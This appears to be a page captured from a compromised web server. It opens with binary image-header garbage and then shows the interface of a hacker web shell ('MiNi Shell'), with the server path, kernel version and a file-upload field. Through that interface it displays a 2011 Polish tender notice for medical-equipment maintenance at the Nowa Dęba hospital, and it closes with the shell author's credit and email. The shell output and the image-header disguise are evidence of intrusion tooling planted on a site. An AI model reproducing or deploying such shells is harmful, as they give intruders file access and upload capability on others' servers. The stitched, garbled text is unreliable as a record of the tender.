JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110601/138954-N-2011.html

<p class="kh_header"><b>Nowa Dęba: Wykonywanie przeglądów technicznych i konserwacji oraz napraw bieżących sprzętu i aparatury medycznej</b><br>
<b>Numer ogłoszenia: 138954 - 2011; data zamieszczenia: 01.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Nowej Dębie , ul. M. Curie-Skłodowskiej 1a, 39-460 Nowa Dęba, woj. podkarpackie, tel. 015 84612651 w. 158.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoznowadeba.ires.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie przeglądów technicznych i konserwacji oraz napraw bieżących sprzętu i aparatury medycznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest     Wykonywanie przeglądów technicznych i konserwacji oraz napraw         
       bieżących  sprzętu i  aparatury  medycznej  z podziałem na Pakiety  dla Szpitala Powiatowego  w Nowej 
        Dębie.
       Zakres świadczonych usług obejmować będzie  utrzymanie sprawności techniczno - eksploatacyjnej urządzeń 
       medycznych znajdujących się na wyposażeniu Szpitala Powiatowego w Nowej Dębie, wymienionych w 
       Załączniku nr 1 -  Wykaz Aparatury i Sprzętu Medycznego - Cennik szczegółowy do SIWZ , w zakresie: 
       konserwacji, przeglądów, oraz  bieżących napraw i prowadzenia paszportów urządzeń medycznych.
       Przedmiot zamówienia obejmuje:
       1)  utrzymanie sprawności techniczno - eksploatacyjnej urządzeń objętych niniejszym zamówieniem,
       2)  konserwację i zachowanie gotowości eksploatacyjnej opartej o zalecenia producentów urządzeń,
       3)  przeprowadzanie okresowych przeglądów i kontroli stanu technicznego sprzętu medycznego,
       4)  prowadzenie paszportów technicznych sprzętu medycznego,
       5)  prowadzenie kart naprawy urządzeń,
       6)  okresowe kontrole sprzętu pomiarowego (kalibracja),
       7) wycena aparatury medycznej oraz sporządzanie notatek o stanie urządzeń, w tym nie nadających się do 
          naprawy.

   SZCZEGÓŁOWE WARUNKI REALIZACJI ZAMÓWIENIA:
   Konserwacji i przeglądom podlegają urządzenia i aparatura medyczna wymieniona w Załączniku nr 1 do SIWZ.
   Okresowe przeglądy będą wykonywane w terminach wynikających z zaleceń producenta, ustalonych z    
   Zamawiającym.
   Wykonawca zobowiązuje się do wykonania czynności konserwacyjnych i przeglądowych zgodnie z przyjętym    
   harmonogramem wynikającym z właściwości danego sprzętu/ aparatury, obowiązującymi instrukcjami, 
   standardami, normą.
   Konieczność przeprowadzenia napraw lub wymiany części zamiennych na nowe Wykonawca będzie uzgadniał z 
   Działem  Technicznym  Zamawiającego, z podaniem przewidywanych kosztów w formie kalkulacji cenowej /    
   kosztorysu.    
   Wykonanie ich nastąpi po akceptacji kalkulacji cenowej / kosztorysu przez Kierownika Zamawiającego.
   Przedmiot zamówienia mogą wykonywać osoby posiadające kwalifikacje do konserwacji urządzeń medycznych, 
   posiadające kwalifikacje do dozoru nad eksploatacją urządzeń, przeszkolone u producenta w zakresie przeglądów  
   urządzeń.

   Czynności konserwatorsko - sprawdzające sprzęt medyczny obejmują w szczególności:
   1)  określenie rodzaju uszkodzenia,
   2)  ewentualną naprawę zużytych podzespołów lub ich wymianę, po akceptacji Zamawiającego,
   3)  wymianę materiałów eksploatacyjnych,
   4)  sprawdzenie prawidłowości działania,
   5)  sprawdzenie i ewentualne czyszczenie elementów aparatury i urządzeń,
   6)  ustawianie (regulacja) wymaganych przez producenta parametrów,
   7)  w przypadku urządzeń podlegających odbiorowi przez inspektorów UDT: przygotowanie urządzenia do 
        odbioru, wykonanie czynności w związku z zaleceniami inspektorów UDT, uczestnictwo w odbiorach z 
        udziałem inspektorów UDT.

     Każda czynność konserwatorska oraz sprawdzenie sprzętu pomiarowego musi zostać potwierdzone w karcie 
     pracy i wpisane przez Wykonawcę do paszportu technicznego urządzenia.
     W przypadku wyłączenia urządzenia z użytkowania do Wykonawcy należy obowiązek umieszczenia na    
     niesprawnym  urządzeniu czytelnej informacji: urządzenie niesprawne nie używać lub urządzenie 
     przeznaczone do naprawy - nie  używać.
     Zgłoszenia konieczności przeprowadzenia konserwacji lub naprawy przekazywane będą w formie telefonicznej/   
     faxu  przez upoważnionego przedstawiciela Zamawiającego.
     Maksymalny czas reakcji Wykonawcy od momentu zgłoszenia w formie telefonicznej / faxu wynosi 48 godzin 
     (w dni  robocze), lub w pierwszy dzień roboczy po zgłoszeniu w dniu wolnym od pracy.
     Gwarancja na wymienione części zamienne i materiały nie może być krótsza od gwarancji danej przez ich 
     producenta.
     Przeglądy techniczne wykonywane są w terminach wynikających z zaleceń producenta lub dostawcy. Zakres   
     czynności  wykonywanych w ramach przeglądów powinien być zgodny z zaleceniami producenta i 
     obowiązującymi przepisami.
     Szczegółowy opis przedmiotu zamówienia w zakresie poszczególnych części (pakietów) stanowi Załącznik nr 1 - 
     Wykaz  Sprzętu i Aparatury Medycznej - Cennik szczegółowy  do SIWZ.    
     Zamówienie obejmuje 62 - Pakiety (dopuszcza się składanie ofert częściowych na poszczególne Pakiety lub na 
     całość  zamówienia).
     Zamawiający zastrzega sobie prawo do zmiany ilości urządzeń podlegających konserwacji i przeglądom 
     technicznym, w  ramach przeprowadzonych postępowań kasacyjnych.
       Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1 - Wykaz Sprzętu i Aparatury Medycznej -   
       Cennik  szczegółowy oraz Załącznik nr 6 - Wzór umowy do SIWZ.  

    Części zamówienia:
    Pakiet nr 1  - Aparatura Rtg 
    Pakiet nr 2  - Aparatura Rtg
    Pakiet nr 3  - Aparatura endoskopowa firmy OLYMPUS 
    Pakiet nr 4  - Sprzęt endoskopowo-laparoskopowy STORZ
    Pakiet nr 5  - Pompy infuzyjne firmy KWAPISZ
    Pakiet nr 6  - Ssaki elektryczne
    Pakiet nr 7  - Ultrasonografy 
    Pakiet nr 8  - Ultrasonografy
    Pakiet nr 9  - Aparatura Rtg
    Pakiet nr 10 - Aparatura do znieczulenia ogólnego
    Pakiet nr 11 - Respiratory 
    Pakiet nr 12  - Aparatura endoskopowa firmy PENTAX
    Pakiet nr 13  - Aparatura laboratoryjna  
    Pakiet nr 14  - Aparatura laboratoryjna
    Pakiet nr 15  - Aparatura laboratoryjna
    Pakiet nr 16  - Wirówki laboratoryjne 
    Pakiet nr 17  - Mikroskopy laboratoryjne
    Pakiet nr 18  - Cieplarki, Suszarki laboratoryjne 
    Pakiet nr 19  - Aparatura do zabiegów chirurgicznych  
    Pakiet nr 20  - Pompy infuzyjne  
    Pakiet nr 21  - Urządzenia do sterylizacji 
    Pakiet nr 22  - Aparaty EKG
    Pakiet nr 23  - Kardiomonitory 
    Pakiet nr 24  - Pulsoksymetry, kapnografy, kardiotokografy
    Pakiet nr 25  - Aparatura RTG 
    Pakiet nr 26  - Urządzenie do badania wydolności płuc 
    Pakiet nr 27  - Urządzenie do badania słuchu
    Pakiet nr 28  -Inhalatory  
    Pakiet nr 29  - Lampy zabiegowe i inne
    Pakiet nr 30  - Aparatura do Hydroterapii 
    Pakiet nr 31  - Aparatura do fizykoterapii 
    Pakiet nr 32  - Aparatura do fizykoterapii  
    Pakiet nr 33  - Aparatura do fizykoterapii  
    Pakiet nr 34  - Aparatura do fizykoterapii  
    Pakiet nr 35  - Aparatura do fizykoterapii  
    Pakiet nr 36  - Defibrylatory  
    Pakiet nr 37  - Inkubatory
    Pakiet nr 38  - Detektory tętna 
    Pakiet nr 39  - Myjki ultradźwiękowe
    Pakiet nr 40  - Urządzenie do badań wysiłkowych
    Pakiet nr 41  - Aparat EEG
    Pakiet nr 42  - Aparatura do zabiegów elektrochirurgicznych
    Pakiet nr 43  - Aparatura do zabiegów elektrochirurgicznych
    Pakiet nr 44  - Aparatura do zabiegów elektrochirurgicznych
    Pakiet nr 45  - Myjnie
    Pakiet nr 46  - Respirator
    Pakiet nr 47  - Stół operacyjny
    Pakiet nr 48  - Lampa operacyjna
    Pakiet nr 49  - Kolposkop
    Pakiet nr 50  - Aparat Rtg
    Pakiet nr 51  - Holter
    Pakiet nr 52  - Aparat do urodynamiki  
    Pakiet nr 53  - Aparat do znieczulenia ogólnego 
    Pakiet nr 54  - Lampy zabiegowe  
    Pakiet nr 55  - Stoły operacyjne i zabiegowe  
    Pakiet nr 56  -  Lampy operacyjne i zabiegowe
    Pakiet nr 57  -  Ultrasonograf
    Pakiet nr 58  -  Monitor
    Pakiet nr 59  -  Wykonanie testów specjalistycznych w Pracowni RTG
    Pakiet nr 60  -  Walidacja aparatury i urządzeń w Banku Krwi
    Pakiet nr 61  -  Aparat  CPAP
    Pakiet nr 62  -  Lampa do fototerapii dla noworodków łóżeczkowa 
    Pakiet nr 63  -  Inkubator otwarty dla noworodków.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.00.00-5, 50.42.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 62.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie.
Ze względu na charakter przedmiotu zamówienia Zamawiający nie żąda od Wykonawców dodatkowych dokumentów, w celu wykazania, iż spełniają  w/w warunek.
Ocena spełnienia powyższego warunku odbędzie się na podstawie oświadczenia, przedstawionego przez Wykonawcę wraz z ofertą - w/g.wzoru na Załączniku nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna Wykonawców, którzy przedstawią wykaz wykonanych w okresie ostatnich 3 lat  min. 2 - ch usług  w zakresie świadczenia  usług  na rzecz jednostek 
                   ochrony zdrowia w tym min. 1 w zakresie lecznictwa stacjonarnego ( szpital)  a jeżeli okres  prowadzenia  działalności 
                   jest  krótszy  - w tym okresie  oraz  załączenie dokumentów potwierdzających, że usługi te  zostały  wykonane  należycie 
                   lub są wykonywane należycie,każde zrealizowane w wartości nie mniejszej niż zaoferowana wartość brutto oferty złożonej w niniejszym postępowaniu, biorąc pod uwagę łączną wartość brutto poszczególnych pakietów - na na które złożono ofertę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie.
Ze względu na charakter przedmiotu zamówienia Zamawiający nie żąda od Wykonawców dodatkowych dokumentów, w celu wykazania, iż spełniają  w/w warunek.
Ocena spełnienia powyższego warunku odbędzie się na podstawie oświadczenia, przedstawionego przez Wykonawcę wraz z ofertą - w/g.wzoru na Załączniku nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna Wykonawców którzy  przedstawią oświadczenie pod rygoremnieważności, że osoby które będą wykonywały prace w zakresie oferowanych pakietów posiadają wszelkie kwalifikacje i doświadczenie zawodowe na świadczenie usług serwisowania sprzetu medycznego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna Wykonawców którzy  przedstawią polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od    
                odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia
                i zobowiązuje się do utrzymania tego  ubezpieczenia przez  okres trwania umowy przy sumie gwarancyjnej  nie mniejszej 
                    niż 20 000,00 zł .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a/ Wypełniony i podpisany  Załącznik nr 1  do SIWZ  -   Wykaz  Sprzętu i Aparatury Medycznej - Cennik szczegółowy 
            ( w zależności  od  wybranego pakietu )
        b/  Wypełniony i podpisany Załącznik nr 2  do SIWZ  -   Podstawa wyceny prac  
        c/  Wypełniony i podpisany Załącznik nr 3  do SIWZ  - Formularz Ofertowo Cenowy Wykonawcy  ( w zależności 
             od  wybranego pakietu i dla każdego pakietu oddzielnie)
        d/  Wypełniony i podpisany Załącznik nr 4 do SIWZ  - Oświadczenie o spełnieniu warunków udziału w 
                                                                           postępowaniu 
        e/  Wypełniony i podpisany Załącznik nr 5 do SIWZ   -  Oświadczenie o braku podstaw do wykluczenia
        f/ Parafowany na każdej stronie Załącznik nr 6 do SIWZ -  Wzór umowy 
        g/   Pełnomocnictwo  osoby / osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie 
              wynikają  z przepisów prawa lub innych dokumentów;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoznowadeba.ires.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotne Ul. M.C.Skłodowskiej 1A
39-460   Nowa Dęba;osob.pokój Nr 111; za zalicz.poczt.przesył.wniosek z adresem i nr NIP.Cena SIWZ 20,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2011 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotne Ul. M.C.Skłodowskiej 1A
39-460   Nowa Dęba - Sekretariat pok.nr 104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com